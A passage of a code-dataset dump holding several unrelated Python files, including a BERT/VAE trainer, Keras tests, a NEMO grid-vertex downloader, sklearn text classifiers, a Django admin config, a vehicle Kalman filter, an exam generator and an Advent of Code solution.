main()\n","sub_path":"DeviceInfo.py","file_name":"DeviceInfo.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"652937795","text":"# coding=utf-8\n# created by Ge Zhang, Jan 20, 2020\n#\n# annotation test file\n\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam, SGD\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nfrom model import BERTLM, BERT, VAE, TempVAE\nfrom .optim_schedule import ScheduledOptim\n\nimport tqdm\nimport pdb\ntorch.manual_seed(0)\n\n\ndef my_loss(reconstructed_pos, origin_pos, origin_neg):\n duplicate = int(origin_neg.shape[0] / reconstructed_pos.shape[0])\n # if duplicate != 5:\n # pdb.set_trace()\n # assert duplicate == 5\n hid_size = origin_neg.shape[-1]\n # print(duplicate)\n pos_sim = torch.bmm(reconstructed_pos.unsqueeze(\n 1), origin_pos.unsqueeze(2)).repeat(1, duplicate, 1).view(-1)\n neg_sim = torch.bmm(reconstructed_pos.repeat(\n 1, duplicate).view(-1, hid_size).unsqueeze(1), origin_neg.unsqueeze(2)).view(-1)\n diff = neg_sim - pos_sim + 1\n # pdb.set_trace()\n diff = torch.max(diff, torch.zeros_like(diff))\n loss = torch.sum(diff)\n return loss\n\n\nclass TempTrainer:\n \"\"\"\n BERTTrainer make the pretrained BERT model with two LM training method.\n\n 1. Masked Language Model : 3.3.1 Task #1: Masked LM\n 2. Next Sentence prediction : 3.3.2 Task #2: Next Sentence Prediction\n\n please check the details on README.md with simple example.\n\n \"\"\"\n\n def __init__(self, bert: BERT, vocab_size: int,\n train_dataloader: DataLoader, test_dataloader: DataLoader,\n lr: float = 1e-4, betas=(0.9, 0.999), weight_decay: float = 0.01, warmup_steps=10000,\n with_cuda: bool = True, cuda_devices=None, log_freq: int = 10, pad_index=0, loss_lambda=1, model_path=None, n_topics=50, weak_supervise=False, context=False, markdown=False, hinge_loss_start_point=20, entropy_start_point=30):\n \"\"\"\n :param bert: BERT model which you want to train\n :param vocab_size: total word vocab size\n :param train_dataloader: train dataset data loader\n :param test_dataloader: test dataset data loader [can be None]\n :param lr: learning rate of optimizer\n :param betas: Adam optimizer betas\n :param weight_decay: Adam optimizer weight decay param\n :param with_cuda: traning with cuda\n :param log_freq: logging frequency of the batch iteration\n :param context: use information from neighbor cells\n \"\"\"\n\n # Setup cuda device for BERT training, argument -c, --cuda should be true\n self.loss_lambda = loss_lambda\n self.n_topics = n_topics\n self.weak_supervise = weak_supervise\n self.context = context\n self.markdown = markdown\n self.hinge_loss_start_point = hinge_loss_start_point\n self.entropy_start_point = entropy_start_point\n cuda_condition = torch.cuda.is_available() and with_cuda\n\n self.device = torch.device(\"cuda:0\" if cuda_condition else \"cpu\")\n\n # This BERT model will be saved every epoch\n self.bert = bert\n # Initialize the BERT Language Model, with BERT model\n self.model = TempVAE(bert, vocab_size, n_topics=n_topics,\n weak_supervise=weak_supervise, context=context, markdown=markdown).to(self.device)\n # pdb.set_trace()\n print(model_path)\n if model_path:\n self.model.load_state_dict(\n torch.load(model_path)[\"model_state_dict\"])\n\n # Distributed GPU training if CUDA can detect more than 1 GPU\n if with_cuda and torch.cuda.device_count() > 1:\n # pdb.set_trace()\n print(\"Using %d GPUS for BERT\" % torch.cuda.device_count())\n self.model = nn.DataParallel(self.model, device_ids=cuda_devices)\n # pdb.set_trace()\n # Setting the train and test data loader\n self.train_data = train_dataloader\n self.test_data = test_dataloader\n\n self.pad_index = pad_index\n # Setting the Adam optimizer with hyper-param\n # self.optim = Adam(self.model.parameters(), lr=lr,\n # betas=betas, weight_decay=weight_decay)\n # self.optim_schedule = ScheduledOptim(\n # self.optim, self.bert.hidden, n_warmup_steps=warmup_steps)\n self.optim = SGD(self.model.parameters(), lr=lr, momentum=0.9)\n # Using Negative Log Likelihood Loss function for predicting the masked_token\n # self.criterion = nn.NLLLoss(ignore_index=self.pad_index)\n self.best_loss = None\n self.updated = False\n self.log_freq = log_freq\n self.cross_entropy = nn.CrossEntropyLoss(ignore_index=0)\n\n print(\"Total Parameters:\", sum([p.nelement()\n for p in self.model.parameters()]))\n\n def train(self, epoch):\n self.model.train()\n # self.optim.zero_grad()\n return self.iteration(epoch, self.train_data)\n\n def test(self, epoch):\n self.model.eval()\n with torch.no_grad():\n loss = self.iteration(epoch, self.test_data, train=False)\n return loss\n\n def api(self, data_loader=None):\n self.model.eval()\n # str_code = \"train\" if train else \"test\"\n if not data_loader:\n data_loader = self.test_data\n\n # Setting the tqdm progress bar\n data_iter = tqdm.tqdm(enumerate(data_loader),\n # desc=\"EP_%s:%d\" % (str_code, epoch),\n total=len(data_loader),\n bar_format=\"{l_bar}{r_bar}\")\n\n avg_loss = 0.0\n total_correct = 0\n total_element = 0\n\n # for (i, data), (ni, ndata) in data_iter, neg_data_iter:\n phases = []\n stages = []\n stage_vecs = []\n with torch.no_grad():\n for i, item in data_iter:\n data = item[0]\n ndata = item[1]\n data = {key: value.to(self.device)\n for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n\n # 0. batch_data will be sent into the device(GPU or cpu)\n data = {key: value.to(self.device)\n for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n # pdb.set_trace()\n # 1. forward the next_sentence_prediction and masked_lm model\n # pdb.set_trace()\n reconstructed_vec, graph_vec, origin_neg, topic_dist, stage_vec = self.model.forward(\n data[\"bert_input\"], ndata[\"bert_input\"], data[\"segment_label\"], ndata[\"segment_label\"], data[\"adj_mat\"], ndata[\"adj_mat\"], train=False)\n # data_loader.dataset.update_topic_dist(topic_dist, data[\"id\"])\n\n # phases += torch.max(topic_dist, 1)[-1].tolist()\n # print(torch.max(stage_vec, 1)[-1].tolist())\n stages += torch.max(stage_vec, 1)[-1].tolist()\n stage_vecs += stage_vec.tolist()\n # pdb.set_trace()\n return stages, stage_vecs\n\n def iteration(self, epoch, data_loader, train=True):\n \"\"\"\n loop over the data_loader for training or testing\n if on train status, backward operation is activated\n and also auto save the model every peoch\n\n :param epoch: current epoch index\n :param data_loader: torch.utils.data.DataLoader for iteration\n :param train: boolean value of is train or test\n :return: None\n \"\"\"\n str_code = \"train\" if train else \"test\"\n\n # Setting the tqdm progress bar\n data_iter = tqdm.tqdm(enumerate(data_loader),\n desc=\"EP_%s:%d\" % (str_code, epoch),\n total=len(data_loader),\n bar_format=\"{l_bar}{r_bar}\")\n\n avg_loss = 0.0\n total_correct = 0\n\n # def calculate_iter(data):\n\n for i, item in data_iter:\n # if train:\n # self.optim.zero_grad()\n data = item[0]\n ndata = item[1]\n\n data = {key: value.to(self.device) for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n # pdb.set_trace()\n\n reconstructed_vec, graph_vec, origin_neg, topic_dist, stage_vec = self.model.forward(\n data[\"bert_input\"], ndata[\"bert_input\"], data[\"segment_label\"], ndata[\"segment_label\"], data[\"adj_mat\"], ndata[\"adj_mat\"], train=train)\n\n bs, _ = reconstructed_vec.shape\n nbs, _ = origin_neg.shape\n duplicate = int(nbs / bs)\n\n hinge_loss = my_loss(reconstructed_vec, graph_vec, origin_neg)\n weight_loss = torch.norm(torch.mm(\n self.model.reconstruction.weight.T, self.model.reconstruction.weight) - torch.eye(self.n_topics).cuda())\n c_entropy = self.cross_entropy(stage_vec, data['stage'])\n entropy = -1 * (F.softmax(stage_vec, dim=1) *\n F.log_softmax(stage_vec, dim=1)).sum()\n # raise NotImplementedError\n if epoch < self.hinge_loss_start_point:\n loss = c_entropy\n # else:\n elif epoch < self.entropy_start_point:\n loss = c_entropy + self.loss_lambda * weight_loss + hinge_loss\n else:\n loss = c_entropy + entropy + self.loss_lambda * weight_loss + hinge_loss\n # loss = self.loss_lambda * weight_loss + hinge_loss\n if epoch == self.hinge_loss_start_point:\n self.optim = SGD(self.model.parameters(),\n lr=0.00001, momentum=0.9)\n\n # pdb.set_trace()\n\n # 3. backward and optimization only in train\n\n if train:\n self.optim.zero_grad()\n loss.backward()\n # self.optim.step_and_update_lr()\n self.optim.step()\n\n avg_loss += loss.item()\n\n post_fix = {\n \"epoch\": epoch,\n \"iter\": i,\n \"avg_loss\": avg_loss / (i + 1),\n # \"avg_acc\": total_correct / total_element * 100,\n \"loss\": loss.item(),\n \"cross_entropy\": c_entropy.item(),\n \"entropy\": entropy.item(),\n \"hinge_loss\": hinge_loss.item()\n }\n\n if i % self.log_freq == 0:\n data_iter.write(str(post_fix))\n\n print(\"EP%d_%s, avg_loss=\" %\n (epoch, str_code), avg_loss / len(data_iter))\n return avg_loss / len(data_iter)\n\n def save(self, epoch, file_path=\"output/bert_trained.model\"):\n \"\"\"\n Saving the current BERT model on file_path\n\n :param epoch: current epoch number\n :param file_path: model output path which gonna be file_path+\"ep%d\" % epoch\n :return: final_output_path\n \"\"\"\n output_path = file_path + \".ep%d\" % epoch\n # if self.updated:\n # return output_path\n # torch.save(self.bert.cpu(), output_path)\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': self.model.state_dict()\n # 'optimizer_state_dict': optimizer.state_dict(),\n # 'loss': loss,\n # ...\n }, output_path)\n # self.bert.to(self.device)\n print(\"EP:%d Model Saved on:\" % epoch, output_path)\n # self.updated = True\n return output_path\n","sub_path":"bert_pytorch/trainer/markdown_test.py","file_name":"markdown_test.py","file_ext":"py","file_size_in_byte":11573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"245124237","text":"import keras\nimport keras_model_specs.model_spec as model_spec\n\n\nfrom keras_model_specs import ModelSpec\nfrom keras_applications.mobilenet import MobileNet\n\n\ndef assert_lists_same_items(list1, list2):\n assert sorted(list1) == sorted(list2)\n\n\ndef test_has_all_base_specs():\n assert_lists_same_items(model_spec.BASE_SPEC_NAMES, model_spec.BASE_SPECS.keys())\n\n for name in model_spec.BASE_SPEC_NAMES:\n spec = ModelSpec.get(name)\n assert spec is not None\n assert spec.name == name\n assert spec.model is not None\n assert spec.target_size is not None\n assert spec.preprocess_func is not None\n assert spec.preprocess_input is not None\n assert spec.keras_kwargs == {'backend': keras.backend,\n 'layers': keras.layers,\n 'models': keras.models,\n 'utils': keras.utils}\n\n\ndef test_as_json_mobilenet_v1():\n spec = ModelSpec.get('mobilenet_v1')\n expected = {\n 'name': 'mobilenet_v1',\n 'model': 'keras_applications.mobilenet.MobileNet',\n 'preprocess_args': None,\n 'preprocess_func': 'between_plus_minus_1',\n 'target_size': [224, 224, 3]\n }\n assert spec.as_json() == expected\n\n\ndef test_returns_none_for_nonexistent_and_spec():\n spec = ModelSpec.get('nonexistent_v1')\n assert spec is None\n\n\ndef test_returns_nonexistent_with_overrides():\n spec = ModelSpec.get(\n 'nonexistent_v1',\n model='keras_applications.mobilenet.MobileNet',\n target_size=[224, 224, 3],\n preprocess_func='mean_subtraction',\n preprocess_args=[1, 2, 3]\n )\n assert spec is not None\n assert spec.model == MobileNet\n assert spec.target_size == [224, 224, 3]\n assert spec.preprocess_func == 'mean_subtraction'\n assert spec.preprocess_args == [1, 2, 3]\n assert spec.preprocess_input is not None\n assert spec.keras_kwargs == {'backend': keras.backend,\n 'layers': keras.layers,\n 'models': keras.models,\n 'utils': keras.utils}\n\n\ndef test_returns_existing_with_overrides():\n spec = ModelSpec.get(\n 'mobilenet_v1',\n model='keras_applications.mobilenet.MobileNet',\n target_size=[512, 512, 3],\n preprocess_func='mean_subtraction',\n preprocess_args=[1, 2, 3]\n )\n assert spec is not None\n assert spec.model == MobileNet\n assert spec.target_size == [512, 512, 3]\n assert spec.preprocess_func == 'mean_subtraction'\n assert spec.preprocess_args == [1, 2, 3]\n assert spec.preprocess_input is not None\n assert spec.keras_kwargs == {'backend': keras.backend,\n 'layers': keras.layers,\n 'models': keras.models,\n 'utils': keras.utils}\n\n\ndef test_load_image_for_all_base_specs():\n for name in model_spec.BASE_SPEC_NAMES:\n spec = ModelSpec.get(name)\n image_data = spec.load_image('tests/files/cat.jpg')\n assert image_data.any()\n","sub_path":"tests/test_model_spec.py","file_name":"test_model_spec.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"252553523","text":"import logging\nimport os\nimport requests\n\nimport netCDF4\nimport numpy\n\n# Logger object\nlog = logging.getLogger(__name__)\n\norca1_grid_shape = (292, 362)\norca025_grid_shape = (1050, 1442)\n\ncached_vertices = {}\n\n\ndef load_vertices_from_file(gridtype, shape):\n global cached_vertices\n gridchar = gridtype\n if shape == orca1_grid_shape:\n mesh = \"ORCA1\"\n elif shape == orca025_grid_shape:\n mesh = \"ORCA025\"\n else:\n log.fatal(\"Unsupported grid resolution for NEMO: %s\" % str(shape))\n return None, None\n if (mesh, gridchar) in cached_vertices.keys():\n return cached_vertices[(mesh, gridchar)][0], cached_vertices[(mesh, gridchar)][1]\n file_name = '-'.join([\"nemo\", \"vertices\", mesh, gridchar, \"grid\"]) + \".nc\"\n fullpath = os.path.join(os.path.dirname(__file__), \"resources\", \"nemo-vertices\", file_name)\n if not os.path.isfile(fullpath):\n if not get_from_b2share(file_name, fullpath):\n log.fatal(\"The file %s could not be downloaded, please install manually at %s\" % (file_name, fullpath))\n return None, None\n nemo_vertices_file_name = os.path.join(\"ece2cmor3/resources/nemo-vertices/\", fullpath)\n nemo_vertices_netcdf_file = netCDF4.Dataset(nemo_vertices_file_name, 'r')\n lon_vertices_raw = numpy.array(nemo_vertices_netcdf_file.variables[\"vertices_longitude\"][...], copy=True)\n lat_vertices = numpy.array(nemo_vertices_netcdf_file.variables[\"vertices_latitude\"][...], copy=True)\n nemo_vertices_netcdf_file.close()\n lon_vertices = numpy.where(lon_vertices_raw < 0, lon_vertices_raw + 360., lon_vertices_raw)\n cached_vertices[(mesh, gridchar)] = (lon_vertices, lat_vertices)\n return lon_vertices, lat_vertices\n\n\ndef get_from_b2share(fname, fullpath):\n site = \"https://b2share.eudat.eu/api\"\n record = \"3ad7d5c5f1ab419297c1e02bded8d70f\"\n resp = requests.get('/'.join([site, \"records\", record]))\n if not resp:\n log.error(\"Problem getting record data from b2share server: %d\" % resp.status_code)\n return False\n d = resp.json()\n for f in d[\"files\"]:\n if f[\"key\"] == fname:\n url = '/'.join([site, \"files\", f[\"bucket\"], f[\"key\"]])\n log.info(\"Downloading file %s from b2share archive...\" % fname)\n fresp = requests.get(url)\n if not fresp:\n log.error(\"Problem getting file %s from b2share server: %d\" % (fname, resp.status_code))\n return False\n with open(fullpath, 'wb') as fd:\n fd.write(fresp.content)\n log.info(\"...success, file %s created\" % fullpath)\n return True\n","sub_path":"ece2cmor3/__load_nemo_vertices__.py","file_name":"__load_nemo_vertices__.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"641389900","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.cluster import KMeans\nimport numpy as np\n\nfrom data import DianPingDataSet\nfrom utils import preprocess_for_ml\n# 直接调用Sklearn中的包 来比较效果\n\n\ndef main():\n # 处理数据\n train_dataset = DianPingDataSet(\"train\")\n test_dataset = DianPingDataSet(\"test\")\n train_labels, train_sents = zip(*train_dataset.pairs)\n test_labels, test_sents = zip(*test_dataset.pairs)\n\n # 将句子分词,这样因为sklearn是根据空格来判断词语之间的界限的\n train_sents = preprocess_for_ml(train_sents)\n test_sents = preprocess_for_ml(test_sents)\n\n # 转换为向量的形式,我们使用词的tf-idf值作为特征\n # 处理中文的时候需要指定token_pattern参数,因为sklearn中默认丢弃长度为1的token\n tfidf = TfidfVectorizer(token_pattern=r\"(?u)\\b\\w+\\b\")\n train_sents_tfidf = tfidf.fit_transform(train_sents)\n test_sents_tfidf = tfidf.transform(test_sents)\n\n # 数据准备好之后,开始进行训练!\n\n # 先尝试一下逻辑斯蒂回归\n lr_clf = LogisticRegression(solver=\"lbfgs\", max_iter=3000)\n lr_clf.fit(train_sents_tfidf, train_labels)\n predicted = lr_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of LogisticRegression: {:.2f}%\".format(acc * 100))\n\n # 朴素贝叶斯:\n nb_clf = MultinomialNB()\n nb_clf.fit(train_sents_tfidf, train_labels)\n predicted = nb_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of Naive Bayes: {:.2f}%\".format(acc * 100))\n\n # 支持向量机\n sgd_clf = SGDClassifier(max_iter=1000, tol=1e-3)\n sgd_clf.fit(train_sents_tfidf, train_labels)\n predicted = sgd_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of SVM: {:.2f}%\".format(acc * 100))\n\n # K近邻\n kn_clf = KNeighborsClassifier()\n kn_clf.fit(train_sents_tfidf, train_labels)\n predicted = kn_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of KNN: {:.2f}%\".format(acc * 100))\n\n # 随机森林\n rf_clf = RandomForestClassifier(n_estimators=20)\n rf_clf.fit(train_sents_tfidf, train_labels)\n predicted = rf_clf.predict(test_sents_tfidf)\n acc = np.mean(predicted == np.array(test_labels))\n print(\"Accuracy of RandomForest: {:.2f}%\".format(acc * 100))\n\n # K均值 需要运行很久的时间,并且效果不好\n # km_clf = KMeans(n_clusters=2).fit(train_sents_tfidf)\n # predicted = km_clf.predict(test_sents_tfidf)\n # acc = np.mean(predicted == np.array(test_labels))\n # print(\"Accuracy of K means: {:.2f}%\".format(acc * 100))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"sklearn_main.py","file_name":"sklearn_main.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"654405537","text":"from django.contrib import admin\nfrom models import *\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass ProjectAdmin(admin.ModelAdmin):\n list_display = ['image_thumb', 'project', 'description']\n\n def image_thumb(self, obj):\n if obj.preview_image:\n return '' % obj.preview_image\n\n image_thumb.allow_tags = True\n image_thumb.short_description = _('preview image')\n\n\nadmin.site.register(Project, ProjectAdmin)\n\n\nclass PropertyImageInline(admin.TabularInline):\n model = PropertyImage\n extra = 0\n\n\nclass PropertyMapInline(admin.TabularInline):\n model = PropertyMap\n extra = 0\n\n\nclass PropertyAdmin(admin.ModelAdmin):\n inlines = [PropertyImageInline, PropertyMapInline]\n list_display = ['image_thumb', 'property', 'short_description']\n\n def image_thumb(self, obj):\n if obj.images.count():\n return '' % obj.images.first().image\n\n image_thumb.allow_tags = True\n image_thumb.short_description = _('preview image')\n\n\nadmin.site.register(Property, PropertyAdmin)","sub_path":"pages/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"613162305","text":"from __future__ import print_function\nimport numpy as np\nfrom copy import copy\nfrom matplotlib import pyplot as plt\nfrom noiseestimation.playback_sensor import PlaybackSensor\nfrom bicycle_ekf import BicycleEKF\n\n# parameters\nused_taps = 100\nmeasurement_var = 1e-5\nR_proto = np.array([[1, 0],\n [0, 2]])\nsim_var = 1e-3\nnum_samples = 3800\n# num_samples = 11670\ndt = 0.01\n\nQ = 0.01\nvar_steer = Q * 0.005\nvar_acc = Q * 2\n\n\ndef setup():\n sim = PlaybackSensor(\"data/vehicle_state.json\",\n fields=[\"fYawrate\", \"fVx\"],\n control_fields=[\"fStwAng\", \"fAx\"])\n # set up kalman filter\n tracker = BicycleEKF(dt)\n tracker.R = sim_var + measurement_var\n tracker.x = np.array([[0, 0, 1e-3]]).T\n tracker.P = np.eye(3) * 500\n tracker.var_steer = var_steer\n tracker.var_acc = var_acc\n\n return sim, tracker\n\n\ndef filtering(sim, tracker):\n # perform sensor simulation and filtering\n Rs = [R_proto * sim_var] * num_samples\n readings, filtered, residuals, Ps, Fs, Ks = [], [], [], [], [], []\n for R in Rs:\n time, reading = sim.read(R)\n measurement = reading[0:2]\n controls = reading[2:]\n # skip low velocities\n if measurement[1, 0] < 0.05:\n continue\n tracker.predict(controls)\n tracker.update(measurement)\n readings.append(reading)\n filtered.append(copy(tracker.x))\n Ps.append(copy(tracker.P))\n residuals.append(tracker.y)\n Fs.append(tracker.F)\n Ks.append(tracker.K)\n # Debug output for critical Kalman gain\n # if tracker.K[1, 1] > 10:\n # print(tracker.K[1, 1])\n # print(reading[3, 0])\n # print(tracker.P)\n # print(tracker.F)\n # print(\"-\" * 15)\n\n readings = np.asarray(readings)\n filtered = np.asarray(filtered)\n residuals = np.asarray(residuals)\n Ps = np.asarray(Ps)\n Fs = np.asarray(Fs)\n Ks = np.asarray(Ks)\n return readings, filtered, residuals, Ps, Fs, Ks\n\n\ndef plot_results(readings, filtered, residuals, Ps):\n # plot_filtered_values(readings, filtered, Ps)\n plot_residuals(readings, filtered, residuals)\n # plot_position(readings, filtered)\n\n\ndef plot_residuals(readings, filtered, residuals):\n zoom_start = 500\n zoom_end = zoom_start + 300\n\n f, axarr = plt.subplots(2, 1, sharex=True)\n axarr[0].set_title(\"Gierrate\")\n axarr[0].plot(\n readings[:, 0] * 180.0 / np.pi,\n 'kx'\n )\n axarr[0].plot(\n filtered[:, 1, 0] * 180.0 / np.pi,\n 'r-')\n axarr[0].set_ylabel(r\"$\\dot{\\psi}$ (deg/s)\")\n axarr[0].set_xlim((zoom_start, zoom_end))\n upper_lim = np.max(filtered[zoom_start:zoom_end, 1, 0]) * 1.2 * 180.0 / np.pi\n lower_lim = np.min(filtered[zoom_start:zoom_end, 1, 0]) * 1.2 * 180.0 / np.pi\n axarr[0].set_ylim((lower_lim, upper_lim))\n\n mean = np.average(residuals[zoom_start:zoom_end, 0, 0])\n axarr[1].set_title(\"Innovation der Gierrate\")\n axarr[1].set_ylabel(r\"$\\Delta\\dot{\\psi}$ (deg/s)\")\n axarr[1].plot([zoom_start, zoom_end], [0, 0], label=\"zero\")\n axarr[1].plot([zoom_start, zoom_end], [mean, mean], label=\"mean\")\n axarr[1].plot(residuals[:, 0, 0], 'o', ms=3, label=\"innovation\")\n axarr[1].set_xlim((zoom_start, zoom_end))\n upper_lim = np.max(residuals[zoom_start:zoom_end, 0, 0]) * 1.2\n lower_lim = np.min(residuals[zoom_start:zoom_end, 0, 0]) * 1.2\n axarr[1].set_ylim((lower_lim, upper_lim))\n axarr[1].set_xlabel(\"Sample\")\n axarr[1].legend(loc=\"lower right\")\n\n plt.show()\n\n\ndef plot_filtered_values(readings, filtered, Ps):\n f, axarr = plt.subplots(3, 1, sharex=True)\n axarr[0].set_title(\"Schwimmwinkel\")\n axarr[0].plot(\n filtered[:, 0] * 180.0 / np.pi,\n 'C2o')\n axarr[0].set_ylim((-10, 15))\n axarr[0].set_ylabel(r\"$\\beta$ (deg)\")\n # axarr[0, 1].set_title(\"Geschaetze Varianz des Schwimmwinkels\")\n # axarr[0, 1].plot(\n # Ps[:, 0, 0]\n # )\n # axarr[0, 1].set_ylim((0, 0.005))\n\n axarr[1].set_title(\"Gierrate\")\n axarr[1].plot(\n readings[:, 0] * 180.0 / np.pi,\n 'kx'\n )\n axarr[1].plot(\n filtered[:, 1] * 180.0 / np.pi,\n 'r-')\n axarr[1].set_ylabel(r\"$\\dot{\\psi}$ (deg/s)\")\n # axarr[1, 1].set_title(\"Geschaetze Varianz der Gierrate\")\n # axarr[1, 1].plot(\n # Ps[:, 1, 1]\n # )\n\n axarr[2].set_title(\"Geschwindigkeit\")\n axarr[2].plot(readings[:, 1], 'kx')\n axarr[2].plot(filtered[:, 2], 'b-')\n axarr[2].set_xlabel(\"Sample\")\n axarr[2].set_ylabel(r\"$v$ (m/s)\")\n # axarr[2, 1].set_title(\"Geschaetze Varianz der Geschwindigkeit\")\n # axarr[2, 1].plot(\n # Ps[:, 2, 2]\n # )\n\n plt.show()\n\n\ndef plot_position(readings, filtered):\n # skip last value in loops\n yaw_angles = [0] * len(filtered)\n for idx, yawrate in enumerate(filtered[:-1, 1, 0]):\n yaw_angles[idx + 1] = yaw_angles[idx] + dt * yawrate\n\n positions = np.zeros((len(filtered), 2))\n for idx in range(len(filtered) - 1):\n sideslip = filtered[idx, 0, 0]\n angle = yaw_angles[idx] + sideslip\n velocity = filtered[idx, 2, 0]\n delta = dt * velocity * np.array([np.cos(angle),\n np.sin(angle)])\n positions[idx + 1] = positions[idx] + delta\n\n plt.plot(positions[:, 0], positions[:, 1], 'C2-')\n plt.plot(positions[0, 0], positions[0, 1], 'bx', label=\"start\")\n plt.plot(positions[-1, 0], positions[-1, 1], 'rx', label=\"end\")\n plt.legend(loc=\"lower right\")\n plt.xlabel(\"x (m)\")\n plt.ylabel(\"y (m)\")\n plt.show()\n\n\ndef run_tracker():\n sim, tracker = setup()\n readings, filtered, residuals, Ps, Fs, Ks = filtering(sim, tracker)\n\n plot_results(readings, filtered, residuals, Ps)\n\n\nif __name__ == \"__main__\":\n run_tracker()\n","sub_path":"ekf/bicycle/residuals.py","file_name":"residuals.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"524364814","text":"\n\n###################\n#\n#\t\t\tREADME\n#\n#\t\tAn extension to this would be a bash wrapper to the convert to pdf and merge into one file\n#\n#\t\tBlueskies:\n#\n#\t\t\t1) Create a GUI for creating new models and tests\n#\n#\t\t\t2) An executable short cut on desktop\n###################\n\nimport secretary\nimport json\nimport random\nimport sys\nimport inflect\n\n\np = inflect.engine()\n\n\ncopies = int(sys.argv[1])\nnumQuestions = int(sys.argv[2])\n\ndef makeCopy(num):\n dictionary = {}\n f = open(\"./questions/test.json\", \"r\")\n questions = json.load(f)\n f.close()\n \n r = random.sample(list(questions.values()), numQuestions)\n counter = 1\n while len(dictionary) < numQuestions:\n dictionary[str(p.number_to_words((counter)))] = r[int(counter-1)]\n counter += 1\n #print(str(p.number_to_words((counter))))\n #print(dictionary)\n engine = secretary.Renderer()\n result = engine.render(\"/home/rr/Development/AntiCheat_format/models/new.odt\", **dictionary)\n output = open(\"/home/rr/Development/AntiCheat_format/tests/{}.odt\".format(num), 'wb')\n output.write(result)\n\n\n\nfor a in range(0, copies):\n makeCopy(a)\n","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"213199737","text":"# test inputs\nnum_players = 9\nhighest_marble = 25\n\n# replace string at index\ndef replace_str_index(text,index=0,replacement=''):\n return '%s%s%s'%(text[:index],replacement,text[index+1:])\n\n# circle of marbles\nclass Circle:\n\n def __init__(self):\n self.marbles = [0]\n self.current = 0 # index of current marble\n \n def _index(self, offset):\n return (self.current + offset) % len(self.marbles) + 1\n\n def add(self, marble, offset=1):\n self.current = self._index(offset)\n self.marbles.insert(self.current, marble)\n \n def remove(self, offset=-8):\n self.current = self._index(offset)\n removed = self.marbles[self.current]\n del self.marbles[self.current]\n return removed\n\n def __repr__(self):\n return ' '.join([f\"({m})\" if i == self.current else f\" {m} \" for i, m in enumerate(self.marbles)])\n\ncircle = Circle()\nprint(circle)\nfor m in range(1, highest_marble + 1):\n if m % 23 == 0:\n print(\"not adding\", m)\n removed = circle.remove()\n print(\"removed\", removed)\n else:\n circle.add(m)\n print(circle)\n\ndef play(num_players, highest_marble):\n players = [0 for i in range(num_players)]\n current = 0\n circle = Circle()\n for m in range(1, highest_marble + 1):\n if m % 23 == 0:\n players[current] += m\n removed = circle.remove()\n players[current] += removed\n else:\n circle.add(m)\n current += 1\n if current == len(players):\n current = 0\n return players\n\nplayers = play(num_players, highest_marble)\nprint(players)\nprint(max(players))\n\ngame_players = [10, 13, 17, 21, 30, 452]\ngame_highest_marbles = [1618, 7999, 1104, 6111, 5807, 70784]\nfor num_players, highest_marble in zip(game_players, game_highest_marbles):\n players = play(num_players, highest_marble)\n print(f\"{num_players} players; last marble is worth {highest_marble} points: high score is {max(players)}\")\n\nnum_players = game_players[-1]\nhighest_marble = game_highest_marbles[-1]*10\n\n# seems to be computationally unfeasible!\nprint(\"part 2\")\nplayers = play(num_players, highest_marble)\nprint(f\"{num_players} players; last marble is worth {highest_marble} points: high score is {max(players)}\")\n","sub_path":"python/day09.py","file_name":"day09.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
